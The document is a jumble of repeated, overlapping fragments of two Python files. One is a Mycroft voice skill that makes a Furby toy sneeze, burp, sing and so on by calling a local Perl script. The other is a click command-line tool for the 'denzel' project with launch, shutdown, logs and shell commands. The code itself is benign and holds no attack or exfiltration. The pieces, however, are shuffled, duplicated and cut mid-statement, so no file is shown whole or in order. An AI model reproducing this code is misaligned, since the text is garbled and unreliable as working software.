__init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message):", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\",", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\",", "MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message):", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\",", "\"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp')", "handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message):", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\",", "def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self,", "handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message):", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"])", "\"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "\"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze')", "\"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent')", "self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing')", "\"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"])", "from mycroft import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent')", "\"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart')", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\",", "@intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def", "self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\",", "mycroft import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def", "@intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def", "def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self,", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"])", "handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk')", "self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\",", "self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\",", "@intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"])", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"])", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message):", "def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass def create_skill(): return", "self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\",", "__init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent')", "@intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep')", "handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self,", "import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self,", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self,", "def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self,", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"])", "\"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\"," ]
[ "commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # --------", "updatepipreqs(): \"\"\"Update services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def", "\"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target", "@cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs", "(sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or", "docker images\", show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # --------", "from requirements.sh on all services\"\"\" commands.updateosreqs() # -------- updatepipreqs -------- @cli.command() def updatepipreqs():", "using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES", "services according to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update", "default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response", "-------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status --------", "to requirements.txt\"\"\" commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using", "logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell --------", "logs\"\"\" commands.logs(service, live) # -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output',", "@click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) #", "pass --sync or --async') if sync and timeout <= 0: raise click.ClickException('Sync timeout", "and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False,", "logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker", "-------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live',", "-------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart -------- @cli.command() def", "def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown", "\"\"\"Set response manner (sync/async) and sync timeout\"\"\" if sync is None: raise click.ClickException('Must", "start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\"", "# -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status", "default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def", "@cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live): \"\"\"Examine status of services", "--sync or --async') if sync and timeout <= 0: raise click.ClickException('Sync timeout must", "--async') if sync and timeout <= 0: raise click.ClickException('Sync timeout must be greater", "and requirements.sh\"\"\" commands.updatereqs() # -------- logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']),", "status view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) #", "view', show_default=True) def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # --------", "@cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs", "raise click.ClickException('Must pass --sync or --async') if sync and timeout <= 0: raise", "@cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout", "show_default=True) def shutdown(purge): \"\"\"Stops and deletes all services\"\"\" commands.shutdown(purge) # -------- start --------", "commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity') @click.option('--timeout', default=5.,", "service', show_default=True) def shell(service): \"\"\"Connect to service bash shell\"\"\" commands.shell(service) # -------- response", "pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA", "# -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart", "# -------- shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def", "type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def", "output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker", "start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() # -------- stop -------- @cli.command()", "\"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port',", ".. import commands from .. import config import click @click.group() def cli(): pass", "commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def", "# -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\"", "import click @click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str)", "startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu', default=False, help=\"Support for NVIDIA GPU\", show_default=True) def", "help='Follow logs output', show_default=True) def logworker(live): \"\"\"Show worker log\"\"\" commands.logworker(live) # -------- shell", "None: raise click.ClickException('Must pass --sync or --async') if sync and timeout <= 0:", "deletes all services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\"", "help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) #", "log\"\"\" commands.logworker(live) # -------- shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True)", "-------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live',", "@click.option('--timeout', default=5., type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set", "def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() # -------- logs --------", "# -------- logworker -------- @cli.command() @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logworker(live):", "def restart(): \"\"\"Restart services\"\"\" commands.restart() # -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live", "# -------- status -------- @cli.command() @click.option('--live/--no-live', default=False, help='Live status view', show_default=True) def status(live):", "def status(live): \"\"\"Examine status of services and worker\"\"\" commands.status(live) # -------- updateosreqs --------", "updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs() #", "bash shell\"\"\" commands.shell(service) # -------- response -------- @cli.command() @click.option('--sync/--async', required=True, default=True, help='Responses synchronicity')", "sync timeout\"\"\" if sync is None: raise click.ClickException('Must pass --sync or --async') if", "-------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service", "shutdown -------- @cli.command() @click.option('--purge/--no-purge', default=False, help=\"Discard the docker images\", show_default=True) def shutdown(purge): \"\"\"Stops", "project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API", "launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown --------", "timeout <= 0: raise click.ClickException('Sync timeout must be greater than 0') commands.response(sync, timeout)", "type=float, show_default=True, help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner", "the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT,", "help='Sync response timeout in seconds') def response(sync, timeout): \"\"\"Set response manner (sync/async) and", "logs -------- @cli.command() @click.option('--service', default='all', type=click.Choice(config.SERVICES + ['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False,", "help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port,", "-------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and requirements.sh\"\"\" commands.updatereqs()", "['all']), help='Target service', show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live):", "use_gpu=gpu) # -------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True)", "GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\" commands.create_project(project_name=name, use_gpu=gpu) #", "help=\"Support for NVIDIA GPU\", show_default=True) def startproject(name, gpu): \"\"\"Builds the denzel project skeleton\"\"\"", "-------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() # -------- restart --------", "@cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to service bash", "services\"\"\" commands.start() # -------- stop -------- @cli.command() def stop(): \"\"\"Stop services\"\"\" commands.stop() #", "commands.updatepipreqs() # -------- updatepipreqs -------- @cli.command() def updatereqs(): \"\"\"Update services using requirements.txt and", "is None: raise click.ClickException('Must pass --sync or --async') if sync and timeout <=", "show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT, type=int, help=\"Monitor UI port\", show_default=True) def launch(api_port, monitor_port): \"\"\"Builds and", "monitor_port): \"\"\"Builds and starts all services\"\"\" commands.launch(api_port, monitor_port) # -------- shutdown -------- @cli.command()", "services\"\"\" commands.stop() # -------- restart -------- @cli.command() def restart(): \"\"\"Restart services\"\"\" commands.restart() #", "updateosreqs -------- @cli.command() def updateosreqs(): \"\"\"Run shell commands from requirements.sh on all services\"\"\"", "show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\" commands.logs(service, live) # -------- logworker --------", "click @click.group() def cli(): pass # -------- startproject -------- @cli.command() @click.argument('name', type=str) @click.option('--gpu/--no-gpu',", "show_default=True) @click.option('--live/--no-live', default=False, help='Follow logs output', show_default=True) def logs(service, live): \"\"\"Show service logs\"\"\"", "services\"\"\" commands.shutdown(purge) # -------- start -------- @cli.command() def start(): \"\"\"Start services\"\"\" commands.start() #", "-------- launch -------- @cli.command() @click.option('--api-port', default=config.API_PORT, type=int, help=\"API endpoints port\", show_default=True) @click.option('--monitor-port', default=config.MONITOR_PORT,", "shell -------- @cli.command() @click.option('--service', default='denzel', type=click.Choice(config.SERVICES), help='Target service', show_default=True) def shell(service): \"\"\"Connect to", "help='Target service', show_default=True) def shell(service): 